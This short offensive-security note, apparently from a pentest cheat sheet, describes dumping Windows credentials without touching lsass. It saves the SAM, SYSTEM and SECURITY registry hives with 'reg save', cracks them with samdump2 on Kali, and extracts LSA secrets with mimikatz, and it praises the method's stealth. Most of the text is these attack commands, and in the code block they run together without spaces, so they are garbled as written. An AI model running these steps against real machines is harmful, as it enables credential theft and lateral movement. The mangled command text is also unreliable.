The lsass Process while great, is no where neaar the only way to dump credintials from windows. One of which is access the three registry hives:
SAM, SYSTEM, and SECURITY. This is a method that can be used to dump credentials without mimikatz as well as offer some potenial stealth.
# The following command will dump the SAM, SYSTEM, and SECURITY hives to the current directory.regsaveHKLM\SAMsam.hiveregsaveHKLM\SYSTEMsystem.hiveregsaveHKLM\SECURITYsecurity.hive#Assuming you have transfered the hives to your kalisamdump2systemsam#We can also get lsa secrets via mimikatzlsadump::secrets/system:c:\temp\system.hive/security:c:\temp\security.hive